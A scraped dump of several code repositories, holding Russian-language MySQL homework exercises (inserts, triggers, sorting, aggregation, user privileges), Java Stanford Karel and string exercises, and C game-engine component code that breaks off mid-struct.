(352,52,5,'2020-12-26 06:43:54.0'),
(38,52,5,'2020-12-26 06:43:54.0'),
(449,52,5,'2020-12-26 06:43:54.0'),
(84,53,5,'2020-12-26 06:43:54.0'),
(403,53,5,'2020-12-26 06:43:54.0'),
(320,54,5,'2020-12-26 06:43:54.0'),
(95,54,5,'2020-12-26 06:43:54.0'),
(90,54,5,'2020-12-26 06:43:54.0'),
(469,54,5,'2020-12-26 06:43:54.0'),
(364,55,13,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(309,56,13,'2020-12-26 06:43:54.0'),
(380,56,13,'2020-12-26 06:43:54.0'),
(111,56,13,'2020-12-26 06:43:54.0'),
(62,56,13,'2020-12-26 06:43:54.0'),
(92,57,13,'2020-12-26 06:43:54.0'),
(126,57,13,'2020-12-26 06:43:54.0'),
(283,57,13,'2020-12-26 06:43:54.0'),
(486,58,13,'2020-12-26 06:43:54.0'),
(354,58,13,'2020-12-26 06:43:54.0'),
(118,58,13,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(201,58,13,'2020-12-26 06:43:54.0'),
(420,58,13,'2020-12-26 06:43:54.0'),
(457,58,13,'2020-12-26 06:43:54.0'),
(133,59,13,'2020-12-26 06:43:54.0'),
(23,59,13,'2020-12-26 06:43:54.0'),
(342,59,13,'2020-12-26 06:43:54.0'),
(54,59,13,'2020-12-26 06:43:54.0'),
(5,59,13,'2020-12-26 06:43:54.0'),
(242,59,13,'2020-12-26 06:43:54.0'),
(440,59,13,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(7,59,13,'2020-12-26 06:43:54.0'),
(336,60,13,'2020-12-26 06:43:54.0'),
(15,60,13,'2020-12-26 06:43:54.0'),
(474,60,13,'2020-12-26 06:43:54.0'),
(139,60,13,'2020-12-26 06:43:54.0'),
(277,61,13,'2020-12-26 06:43:54.0'),
(295,61,13,'2020-12-26 06:43:54.0'),
(86,61,13,'2020-12-26 06:43:54.0'),
(327,61,13,'2020-12-26 06:43:54.0'),
(86,62,13,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(30,62,13,'2020-12-26 06:43:54.0'),
(77,63,13,'2020-12-26 06:43:54.0'),
(84,64,13,'2020-12-26 06:43:54.0'),
(447,64,13,'2020-12-26 06:43:54.0'),
(404,65,13,'2020-12-26 06:43:54.0'),
(140,65,13,'2020-12-26 06:43:54.0'),
(134,65,13,'2020-12-26 06:43:54.0'),
(99,65,13,'2020-12-26 06:43:54.0'),
(141,65,13,'2020-12-26 06:43:54.0'),
(157,65,13,'2020-12-26 06:43:54.0');<file_sep>use homework;
-- Оптимизация запросов
-- 1. Создайте таблицу logs типа Archive. Пусть при каждом создании записи в таблицах users, catalogs и products в таблицу logs помещается время и дата создания записи, название таблицы, идентификатор первичного ключа и содержимое поля name.
drop table logs;
create table if not exists logs(
created_at datetime not null, -- время и дата создания записи
table_name varchar(255) not null, -- название таблицы
id bigint not null, -- идентификатор первичного ключа
name_value varchar(255) not null -- содержимое поля name
) engine=archive default charset=utf8;
-- при каждом создании записи в таблицах users, catalogs и products
drop trigger if exists create_log_on_insert;
delimiter //
create trigger create_log_on_insert before insert on users
for each row
begin
insert into logs(created_at, table_name, id, name_value)
values (now(), 'users', new.id, new.name);
end//
delimiter ;
insert into users (name, birthday_at)
values ('Андрей', '2020-01-01');
select * from logs;
delimiter //
create trigger create_log_on_insert2 before insert on catalogs
for each row
begin
insert into logs(created_at, table_name, id, name_value)
values (now(), 'catalogs', new.id, new.name);
end//
create trigger create_log_on_insert3 before insert on products
for each row
begin
insert into logs(created_at, table_name, id, name_value)
values (now(), 'products', new.id, new.name);
end//
delimiter ;
<file_sep>create database if not exists homework;
use homework;
DROP TABLE IF EXISTS catalogs;
CREATE TABLE catalogs (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название раздела',
UNIQUE unique_name(name(10))
) COMMENT = 'Разделы интернет-магазина';
INSERT INTO catalogs VALUES
(NULL, 'Процессоры'),
(NULL, 'Материнские платы'),
(NULL, 'Видеокарты'),
(NULL, 'Жесткие диски'),
(NULL, 'Оперативная память');
DROP TABLE IF EXISTS users;
CREATE TABLE users (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Имя покупателя',
birthday_at DATE COMMENT 'Дата рождения',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Покупатели';
INSERT INTO users (name, birthday_at) VALUES
('Геннадий', '1990-10-05'),
('Наталья', '1984-11-12'),
('Александр', '1985-05-20'),
('Сергей', '1988-02-14'),
('Иван', '1998-01-12'),
('Мария', '1992-08-29');
DROP TABLE IF EXISTS products;
CREATE TABLE products (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название',
description TEXT COMMENT 'Описание',
price DECIMAL (11,2) COMMENT 'Цена',
catalog_id INT UNSIGNED,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_catalog_id (catalog_id)
) COMMENT = 'Товарные позиции';
INSERT INTO products
(name, description, price, catalog_id)
VALUES
('Intel Core i3-8100', 'Процессор для настольных персональных компьютеров, основанных на платформе Intel.', 7890.00, 1),
('Intel Core i5-7400', 'Процессор для настольных персональных компьютеров, основанных на платформе Intel.', 12700.00, 1),
('AMD FX-8320E', 'Процессор для настольных персональных компьютеров, основанных на платформе AMD.', 4780.00, 1),
('AMD FX-8320', 'Процессор для настольных персональных компьютеров, основанных на платформе AMD.', 7120.00, 1),
('ASUS ROG MAXIMUS X HERO', 'Материнская плата ASUS ROG MAXIMUS X HERO, Z370, Socket 1151-V2, DDR4, ATX', 19310.00, 2),
('Gigabyte H310M S2H', 'Материнская плата Gigabyte H310M S2H, H310, Socket 1151-V2, DDR4, mATX', 4790.00, 2),
('MSI B250M GAMING PRO', 'Материнская плата MSI B250M GAMING PRO, B250, Socket 1151, DDR4, mATX', 5060.00, 2);
DROP TABLE IF EXISTS orders;
CREATE TABLE orders (
id SERIAL PRIMARY KEY,
user_id INT UNSIGNED,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_user_id(user_id)
) COMMENT = 'Заказы';
DROP TABLE IF EXISTS orders_products;
CREATE TABLE orders_products (
id SERIAL PRIMARY KEY,
order_id INT UNSIGNED,
product_id INT UNSIGNED,
total INT UNSIGNED DEFAULT 1 COMMENT 'Количество заказанных товарных позиций',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Состав заказа';
DROP TABLE IF EXISTS discounts;
CREATE TABLE discounts (
id SERIAL PRIMARY KEY,
user_id INT UNSIGNED,
product_id INT UNSIGNED,
discount FLOAT UNSIGNED COMMENT 'Величина скидки от 0.0 до 1.0',
started_at DATETIME,
finished_at DATETIME,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_user_id(user_id),
KEY index_of_product_id(product_id)
) COMMENT = 'Скидки';
DROP TABLE IF EXISTS storehouses;
CREATE TABLE storehouses (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Склады';
DROP TABLE IF EXISTS storehouses_products;
CREATE TABLE storehouses_products (
id SERIAL PRIMARY KEY,
storehouse_id INT UNSIGNED,
product_id INT UNSIGNED,
value INT UNSIGNED COMMENT 'Запас товарной позиции на складе',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Запасы на складе';
-- Практическое задание по теме «Операторы, фильтрация, сортировка и ограничение»
-- 1. Пусть в таблице users поля created_at и updated_at оказались незаполненными. Заполните их текущими датой и временем.
INSERT INTO users (name, birthday_at,created_at, updated_at) VALUES
('Евгения', '1999-10-05', null, null),
('Карина', '1998-10-05', null, null),
('Александра', '1970-10-05', null, null);
SELECT * from users;
UPDATE users
SET created_at = NOW() where created_at is null;
UPDATE users
set updated_at = NOW() where updated_at is null;
SELECT * from users;
-- 2.Таблица users была неудачно спроектирована. Записи created_at и updated_at были заданы типом VARCHAR и в них долгое время помещались значения в формате 20.10.2017 8:10. Необходимо преобразовать поля к типу DATETIME, сохранив введённые ранее значения.
ALTER TABLE users
CHANGE COLUMN `created_at` `created_at` VARCHAR(256),
CHANGE COLUMN `updated_at` `updated_at` VARCHAR(256);
-- describe users;
-- SELECT `created_at`, `updated_at` from users;
ALTER TABLE users
CHANGE COLUMN `created_at` `created_at` DATETIME DEFAULT CURRENT_TIMESTAMP,
CHANGE COLUMN `updated_at` `updated_at` DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP;
describe users;
SELECT * from users;
-- 3. В таблице складских запасов storehouses_products в поле value могут встречаться самые разные цифры: 0, если товар закончился и выше нуля, если на складе имеются запасы. Необходимо отсортировать записи таким образом, чтобы они выводились в порядке увеличения значения value. Однако нулевые запасы должны выводиться в конце, после всех записей.
describe storehouses_products;
INSERT INTO storehouses_products (storehouse_id, product_id, value) VALUES
(1, 8, 0),
(1, 9, 2500),
(1, 29, 0),
(1, 34, 30),
(1, 4, 500),
(1, 1, 1);
-- SELECT * from storehouses_products;
select value from storehouses_products
order by if(value > 0, 0, 1), value;
-- 4. Из таблицы users необходимо извлечь пользователей, родившихся в августе и мае. Месяцы заданы в виде списка английских названий (may, august)
-- INSERT INTO users (name, birthday_at,created_at, updated_at) VALUES
-- ('Cjamz', '1999-08-05', null, null),
-- ('Карина', '1998-05-08', null, null);
-- SELECT * from users;
SELECT name, birthday_at from users
where date_format(birthday_at, '%m') = 05 or date_format(birthday_at, '%m') = 08;
SELECT name, birthday_at,
case
when date_format(birthday_at, '%m') = 05 then 'may'
when date_format(birthday_at, '%m') = 08 then 'august'
end as `month`
from users
where date_format(birthday_at,'%m') = '05' or date_format(birthday_at,'%m') = '08'
order by `month`;
-- 5.Из таблицы catalogs извлекаются записи при помощи запроса. SELECT * FROM catalogs WHERE id IN (5, 1, 2); Отсортируйте записи в порядке, заданном в списке IN.
SELECT * from catalogs
where id IN (5, 1, 2)
order by FIELD(id, 5, 1, 2);
<file_sep>create database if not exists homework;
use homework;
DROP TABLE IF EXISTS catalogs;
CREATE TABLE catalogs (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название раздела',
UNIQUE unique_name(name(10))
) COMMENT = 'Разделы интернет-магазина';
INSERT INTO catalogs VALUES
(NULL, 'Процессоры'),
(NULL, 'Материнские платы'),
(NULL, 'Видеокарты'),
(NULL, 'Жесткие диски'),
(NULL, 'Оперативная память');
DROP TABLE IF EXISTS users;
CREATE TABLE users (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Имя покупателя',
birthday_at DATE COMMENT 'Дата рождения',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Покупатели';
INSERT INTO users (name, birthday_at) VALUES
('Геннадий', '1990-10-05'),
('Наталья', '1984-11-12'),
('Александр', '1985-05-20'),
('Сергей', '1988-02-14'),
('Иван', '1998-01-12'),
('Мария', '1992-08-29');
DROP TABLE IF EXISTS products;
CREATE TABLE products (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название',
description TEXT COMMENT 'Описание',
price DECIMAL (11,2) COMMENT 'Цена',
catalog_id INT UNSIGNED,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_catalog_id (catalog_id)
) COMMENT = 'Товарные позиции';
INSERT INTO products
(name, description, price, catalog_id)
VALUES
('Intel Core i3-8100', 'Процессор для настольных персональных компьютеров, основанных на платформе Intel.', 7890.00, 1),
('Intel Core i5-7400', 'Процессор для настольных персональных компьютеров, основанных на платформе Intel.', 12700.00, 1),
('AMD FX-8320E', 'Процессор для настольных персональных компьютеров, основанных на платформе AMD.', 4780.00, 1),
('AMD FX-8320', 'Процессор для настольных персональных компьютеров, основанных на платформе AMD.', 7120.00, 1),
('ASUS ROG MAXIMUS X HERO', 'Материнская плата ASUS ROG MAXIMUS X HERO, Z370, Socket 1151-V2, DDR4, ATX', 19310.00, 2),
('Gigabyte H310M S2H', 'Материнская плата Gigabyte H310M S2H, H310, Socket 1151-V2, DDR4, mATX', 4790.00, 2),
('MSI B250M GAMING PRO', 'Материнская плата MSI B250M GAMING PRO, B250, Socket 1151, DDR4, mATX', 5060.00, 2);
DROP TABLE IF EXISTS orders;
CREATE TABLE orders (
id SERIAL PRIMARY KEY,
user_id INT UNSIGNED,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_user_id(user_id)
) COMMENT = 'Заказы';
DROP TABLE IF EXISTS orders_products;
CREATE TABLE orders_products (
id SERIAL PRIMARY KEY,
order_id INT UNSIGNED,
product_id INT UNSIGNED,
total INT UNSIGNED DEFAULT 1 COMMENT 'Количество заказанных товарных позиций',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Состав заказа';
DROP TABLE IF EXISTS discounts;
CREATE TABLE discounts (
id SERIAL PRIMARY KEY,
user_id INT UNSIGNED,
product_id INT UNSIGNED,
discount FLOAT UNSIGNED COMMENT 'Величина скидки от 0.0 до 1.0',
started_at DATETIME,
finished_at DATETIME,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_user_id(user_id),
KEY index_of_product_id(product_id)
) COMMENT = 'Скидки';
DROP TABLE IF EXISTS storehouses;
CREATE TABLE storehouses (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Склады';
DROP TABLE IF EXISTS storehouses_products;
CREATE TABLE storehouses_products (
id SERIAL PRIMARY KEY,
storehouse_id INT UNSIGNED,
product_id INT UNSIGNED,
value INT UNSIGNED COMMENT 'Запас товарной позиции на складе',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Запасы на складе';
-- Практическое задание теме «Агрегация данных»
-- 1. Подсчитайте средний возраст пользователей в таблице users.
SELECT round(avg((to_days(now())-to_days(birthday_at))/365.25))
as averageage from users;
-- 2. Подсчитайте количество дней рождения, которые приходятся на каждый из дней недели. Следует учесть, что необходимы дни недели текущего года, а не года рождения.
select
dayname(concat(year(now()), '-', substring(birthday_at, 6, 10))) as birthdayonweekthisyear,
COUNT(*) AS amount_of_birthdays
from users
group by birthdayonweekthisyear
order by amount_of_birthdays desc;
-- 3. Подсчитайте произведение чисел в столбце таблицы.
drop table if exists numbers;
create table numbers(
id SERIAL PRIMARY KEY);
INSERT INTO numbers values
(1), (2), (3), (4), (NULL);
SELECT exp(sum(log(id))) from numbers;
<file_sep>-- јдминистрирование MySQL
-- 1. —оздайте двух пользователей которые имеют доступ к базе данных shop.
-- ѕервому пользователю shop_read должны быть доступны только запросы на чтение данных, второму пользователю shop Ч любые операции в пределах базы данных shop.
use shop;
drop user if exists 'shop'@'localhost';
create user 'shop'@'localhost';
grant all on shop.* to 'shop'@'localhost';
grant grant option on shop.* to 'shop'@'localhost';
create user if not exists 'shop_read'@'localhost';
grant select on shop.* to 'shop_read'@'localhost';
| 4e87c90797f80c7b079ea860b1b2081338a751a7 | [
"SQL"
] | 12 | SQL | sofo4ka/MySQL_Homework | f2b6991b8c7fdb2d43a39baeb92e879917443c15 | c112ae07eccf0304ae226d75dccd66c7d7df5111 |
refs/heads/master | <file_sep>
public class StringsAndCharacters {
public static void main(String[] args) {
String doubleLetter = "Wellcome";
System.out.println(removeDoubledLetters(doubleLetter));
}
public static String removeDoubledLetters(String line) {
String newLine = "";
for(int i = 0; i < line.length(); i++) {
char ch = line.charAt(i);
if(i == 0 || ch != line.charAt(i-1)) {
newLine += ch;
}
}
return newLine;
}
}<file_sep>import stanford.karel.*;
public class BorderKarel extends SuperKarel {
public void run() {
turnLeft();
move();
turnRight();
for(int i = 0; i < 4; i ++) {
drawRow();
}
}
public void drawRow() {
move();
while(noBeepersPresent() == true) {
if(frontIsBlocked() == true) break;
putBeeper();
move();
}
turnAround();
move();
turnRight();
}
} | 6c2cd26e6c647bd0e597a106650c6b6c051a9795 | [
"Java"
] | 2 | Java | Squyres/Midterm_Stanford | ddc3cd440f5b6e4b5cc7c26a4efaaf31cd93e286 | 83b5e436b4063ab85b767563f0d0ecda52aa6d0c |
refs/heads/main | <repo_name>rkwantify/msk-movie-app<file_sep>/README.md
# Getting Started
* Run `yarn start` and navigate your browser to [http://localhost:3000](http://localhost:3000)
* API key is hardcoded for convenience
* This project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app). Please see CRA-README.md for more details.
# Tech Stack
* React, TypeScript, React Router, React Hooks and Context API, CSS
* _debounce from lodash
# Features
# TODO
* Complete styling for modal
* Implement pagination for API calls
* Use custom hook to abstract away repetitive API logic from presentational components
* Implement tests
* Rename some components and variables
<file_sep>/src/api/api.ts
const BASE_API_URL = 'https://api.themoviedb.org/3';
const BASE_IMAGE_URL = 'https://image.tmdb.org/t/p/';
// const API_KEY = process.env.REACT_APP_TMDB_API_KEY;
const API_KEY = '<KEY>';
const generateURL = (path: string, params = {}) => {
let searchParams = new URLSearchParams({ api_key: API_KEY + '', ...params });
let queryString = searchParams.toString();
return `${BASE_API_URL}${path}?${queryString}`;
};
export const getMovieDetailsAndCast = (id: number | undefined) => {
return generateURL(`/movie/${id}`, { append_to_response: 'credits' });
};
export const searchMovies = (searchQuery: string) => {
return generateURL(`/search/movie`, {query: searchQuery})
}
export const getMoviePoster = (posterPath: string) => {
return `${BASE_IMAGE_URL}/w185${posterPath}`;
};
export const getUpcomingMovies = () => {
return generateURL('/movie/upcoming');
};
export const getPopularMovies = () => {
return generateURL('/movie/popular');
};
export const getMovieCast = (id: number | undefined) => {
return generateURL(`/movie/${id}/credits`);
};
| 39ab4134fab130bfaa92015a68cb7f5e06d2efcc | [
"Markdown",
"TypeScript"
] | 2 | Markdown | rkwantify/msk-movie-app | 0c0e2e93f6491de77263ecbf5b581fb456f84a21 | 9a7df9d43099277d89184ee5aec78948816ff542 |
refs/heads/master | <file_sep>
$(document).ready(function() {
demo.initFormExtendedDatetimepickers();
demo.initMaterialWizard();
function setFormValidation(id) {
$(id).validate({
errorPlacement: function(error, element) {
$(element).parent('div').addClass('has-error');
}
});
}
});
$(document).ready(function() {
setFormValidation('#RegisterValidation');
setFormValidation('#TypeValidation');
setFormValidation('#LoginValidation');
setFormValidation('#RangeValidation');
md.initSliders()
});
$(function() {
var states = [
"Alabama",
"Alaska",
"Arizona",
"Arkansas",
"California",
"Canada",
"Colorado",
"Connecticut",
"Deleware",
"District of Columbia",
"Florida",
"Georgia",
"Hawaii",
"Idaho",
"Illinois",
"Indiana",
"Iowa",
"Kansas",
"Kentucky",
"Louisiana",
"Maine",
"Maryland",
"Massachusetts",
"Michigan",
"Minnesota",
"Mississippi",
"Missouri",
"Montana",
"Nebraska",
"Nevada",
"New Hampshire",
"New Jersey",
"New Mexico",
"New York",
"North Carolina",
"North Dakota",
"Ohio",
"Oklahoma",
"Oregon",
"Pennsylvania",
"Puerto Rico",
"Rhode Island",
"South Carolina",
"South Dakota",
"Tennessee",
"Texas",
"Utah",
"Vermont",
"Virginia",
"Washington",
"West Virginia",
"Wisconsin",
"Wyoming",
];
$( "#automplete-states, #states2" ).autocomplete({
source: states,
autoFocus:true
});
});
$(function() {
var skills = [
"Accounting",
"Administration",
"BioTrackTHC",
"Budtender",
"Business Development",
"Chemistry",
"Communication",
"Computer Programming",
"Consulting",
"Creativity",
"Culinary",
"Customer Service",
"Entrepreneurship",
"Event Planning",
"Extraction",
"Finance",
"Flow Hub",
"Growing",
"Health Care",
"Horticulture",
"Human Resources",
"Inventory",
"Investments",
"Leadership",
"Legal",
"Marketing",
"Metric",
"MIPS",
"MJfreeway",
"MMJMenu",
"Motivated",
"Multi-Tasking",
"Networking",
"Organizational Skills",
"Packaging",
"Pak",
"PakArab",
"Presentation Skills",
"Public Relations",
"Reliability",
"Sales",
"Security",
"Social Media",
"Strain Knowledge",
"Teamwork",
"Time Managment",
"Trimming",
"Writing",
"Other",
];
$( "#automplete-skills, #skills2, #skills3" ).autocomplete({
source: skills,
autoFocus:true
});
});
$(function() {
var month = [
"January",
"February",
"March",
"April",
"May",
"June",
"July",
"August",
"September",
"October",
"November",
"December"
];
$( "#automplete-month" ).autocomplete({
source: month,
autoFocus:true
});
});
$(function() {
var year = [
"2017",
"2018",
"2019",
"2020",
"2021",
"2022",
"2023",
"2024",
"2025",
"2026",
"2027",
"2028",
"2029",
"2030"
];
$( "#automplete-year" ).autocomplete({
source: year,
autoFocus:true
});
});
$(document).ready(function() {
$('#datatables').DataTable({
"pagingType": "full_numbers",
"lengthMenu": [
[10, 25, 50, -1],
[10, 25, 50, "All"]
],
responsive: true,
language: {
search: "_INPUT_",
searchPlaceholder: "Search records",
}
});
var table = $('#datatables').DataTable();
// Edit record
table.on('click', '.edit', function() {
$tr = $(this).closest('tr');
var data = table.row($tr).data();
alert('You press on Row: ' + data[0] + ' ' + data[1] + ' ' + data[2] + '\'s row.');
});
// Delete a record
table.on('click', '.remove', function(e) {
$tr = $(this).closest('tr');
table.row($tr).remove().draw();
e.preventDefault();
});
//Like record
table.on('click', '.like', function() {
alert('You clicked on Like button');
});
$('.card .material-datatables label').addClass('form-group');
});
| 2d4b6984e618da1915c722ee0acadb2242766c3e | [
"JavaScript"
] | 1 | JavaScript | molson303/V_dashboard | 27910bfb57eb9ffca5aa901a4e97aba945a89af2 | e1aa902ce919cc3bd03743d5c1294004efd1180c |
refs/heads/master | <file_sep>package ma.ensias.VirusCop.util;
import jade.core.ProfileImpl;
import jade.util.ExtendedProperties;
import jade.util.leap.Properties;
import jade.wrapper.ContainerController;
import jade.core.Runtime;
public class Plateforme{
private ContainerController mainContainer, aContainer;
private boolean isMain;
private String name;
public Plateforme(boolean isMain, String name) {
if(isMain) {
Runtime rt = Runtime.instance();
Properties p = new ExtendedProperties() ; //fixer quelques propri�t�s
p.setProperty("gui","true") ;
ProfileImpl profile = new ProfileImpl(p);
mainContainer = rt.createMainContainer(profile); //cr�er le main-container
}else {
Runtime rt = Runtime.instance() ;
ProfileImpl profile = new ProfileImpl(false);
//Le main container associ� est d�j� d�marr� sur localhost
profile.setParameter(ProfileImpl.MAIN_HOST, "localhost");
profile.setParameter(ProfileImpl.CONTAINER_NAME, name);
aContainer = rt.createAgentContainer(profile);
}
}
public ContainerController getMainContainer(){return mainContainer;}
public ContainerController getAContainer(){return aContainer;}
}<file_sep>package ma.ensias.VirusCop.behaviours;
import java.util.List;
import jade.core.Agent;
import jade.core.ContainerID;
import jade.core.behaviours.TickerBehaviour;
public class MovingCopBehaviour extends TickerBehaviour {
protected List<String> itinerary;
protected int nodeStep = 0; // Starting with stationContainer (racine).;
private int period;
public MovingCopBehaviour(Agent a, List<String> itinerary, int period) {
super(a, period);
this.itinerary = itinerary;
}
@Override
protected void onTick() {
System.out.println(itinerary.get(nodeStep));
ContainerID cid = new ContainerID();
cid.setName(itinerary.get(nodeStep));
cid.setAddress("localhost");
getAgent().doMove(cid);
// if we're at the last step of the itinerary.
if(nodeStep+1==itinerary.size()) {
getAgent().doDelete();
}
nodeStep++;
}
}
<file_sep>package ma.ensias.VirusCop.agents;
import java.util.List;
import jade.content.lang.sl.SLCodec;
import jade.content.onto.basic.Action;
import jade.content.onto.basic.Result;
import jade.core.AID;
import jade.core.Agent;
import jade.core.ContainerID;
import jade.core.behaviours.CyclicBehaviour;
import jade.core.behaviours.TickerBehaviour;
import jade.domain.FIPANames;
import jade.domain.JADEAgentManagement.JADEManagementOntology;
import jade.domain.JADEAgentManagement.QueryAgentsOnLocation;
import jade.lang.acl.ACLMessage;
import jade.lang.acl.MessageTemplate;
import jade.wrapper.AgentController;
import jade.wrapper.ControllerException;
import ma.ensias.VirusCop.behaviours.MovingCopBehaviour;
import ma.ensias.VirusCop.behaviours.SearchAndKillBehaviour;
import ma.ensias.VirusCop.util.utils;
public class MobileCop extends Agent {
protected List<String> itinerary;
protected int nodeStep = 0; // Starting with stationContainer;
private int period;
protected void setup() {
// DEFINE ONTOLOGY & FIPA CODEC NORM.
getContentManager().registerOntology(JADEManagementOntology.getInstance());
getContentManager().registerLanguage(new SLCodec(), FIPANames.ContentLanguage.FIPA_SL0);
Object[] args = getArguments();
itinerary = (List<String>) args[0];
period = (int) args[1];
System.out.println("Agent MobileCop cree : " + getLocalName());
// MOBILE COP AGENT IS MOVING THROUGH ITINERARY, SEARCHING FOR THE INTRUDER. ENDING ITS ITINERARY WITH ROOT.
addBehaviour(new MovingCopBehaviour(this, itinerary, period));
// CYCLICBEHAVIOUR SCAN TO SEARCH THE INTRUDER AGENT, AND KILL IT IF EXISTS.
addBehaviour(new SearchAndKillBehaviour(this));
}
//la terminaison de l'agent
protected void takeDown() {
System.out.println("Agent MobileCop a fait le tour est detruit : "+getLocalName());
}
protected void beforeMove() {
}
//au niveau du container d'arrivée
protected void afterMove() {
try {
getContentManager().registerOntology(JADEManagementOntology.getInstance());
getContentManager().registerLanguage(new SLCodec(), FIPANames.ContentLanguage.FIPA_SL0);
System.out.println("Agent ("+getLocalName()+") arrivée : "+getContainerController().getContainerName());
} catch (ControllerException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
<file_sep>package ma.ensias.VirusCop.agents;
import java.util.List;
import jade.content.lang.sl.SLCodec;
import jade.content.onto.basic.Action;
import jade.content.onto.basic.Result;
import jade.core.AID;
import jade.core.Agent;
import jade.core.ContainerID;
import jade.core.behaviours.CyclicBehaviour;
import jade.core.behaviours.TickerBehaviour;
import jade.domain.FIPANames;
import jade.domain.JADEAgentManagement.JADEManagementOntology;
import jade.domain.JADEAgentManagement.QueryAgentsOnLocation;
import jade.lang.acl.ACLMessage;
import jade.lang.acl.MessageTemplate;
import jade.wrapper.AgentController;
import jade.wrapper.ControllerException;
import jade.wrapper.StaleProxyException;
import ma.ensias.VirusCop.behaviours.RespawnCopBehaviour;
import ma.ensias.VirusCop.behaviours.StationScanRootBehaviour;
import ma.ensias.VirusCop.main.Main;
public class FixCop extends Agent {
protected void setup() {
// DEFINE ONTOLOGY & FIPA CODEC NORM.
getContentManager().registerOntology(JADEManagementOntology.getInstance());
getContentManager().registerLanguage(new SLCodec(), FIPANames.ContentLanguage.FIPA_SL0);
System.out.println("Agent FixCop cree : "+getLocalName());
Object[] args = getArguments();
List<String> itinerary = (List<String>) args[0];
int period = (int) args[1];
// POLICIER STATIONNAIRE DO THE CYCLIC BEHAVIOUR TO SCAN THE ROOT , IF THE INTRUDER IS IN ROOT, POLICIER STATIO KILLS HIM.
addBehaviour(new StationScanRootBehaviour(this));
// RESPAWN ANOTHER POLICIER MOBILE AFTER EACH POLICIER MOBILE's LIFETIME DURATION ELAPSES.
addBehaviour(new RespawnCopBehaviour(this, period, itinerary));
}
}
| fdf7f83ab76ae77a285bac99e887098212468d49 | [
"Java"
] | 4 | Java | NabilRM/SMA-Project | 3466deab579ca9e071d9db4f7381ce8f4b1307aa | 2bc66098f4cb33ac87bd236691f565830220b47c |
refs/heads/master | <file_sep>#pragma once
void game_init(void);
void game_update(void);
void game_cleanup(void);
void game_render(void);<file_sep>#include <stdlib.h>
#include <string.h>
#include "component.h"
#include "hash.h"
Component_Type init_component_type(int length)
{
Component_Type new_component;
new_component.data = (void**)malloc(sizeof(void*) * length);
new_component.hashmap = (int*)malloc(sizeof(int) * length);
new_component.length = length;
new_component.real_length = 0;
for(int i = 0; i < length; i++)
{
new_component.hashmap[i] = -1;
}
return new_component;
}
void add_component(Component_Type *component_type, void *component_data, int entity_id)
{
component_type->data[component_type->real_length] = component_data;
component_type->hashmap[hash(entity_id, component_type->length)] = component_type->real_length;
component_type->real_length++;
}
void remove_component(Component_Type *component_type, int entity_id)
{
int hash_result = hash(entity_id, component_type->length);
component_type->data[hash_result] = component_type->data[component_type->real_length];
component_type->hashmap[hash_result] = -1;
component_type->data[component_type->real_length] = NULL;
component_type->real_length--;
}
void *get_component(Component_Type *component_type, int entity_id)
{
int hash_result = hash(entity_id, component_type->length);
if(component_type->hashmap[hash_result] == -1)
{
return NULL;
}
else
{
return component_type->data[component_type->hashmap[hash_result]];
}
}<file_sep>#pragma once
#include "../../component.h"
#include "collision_info.h"
typedef struct
{
int entity_id;
int x, y;
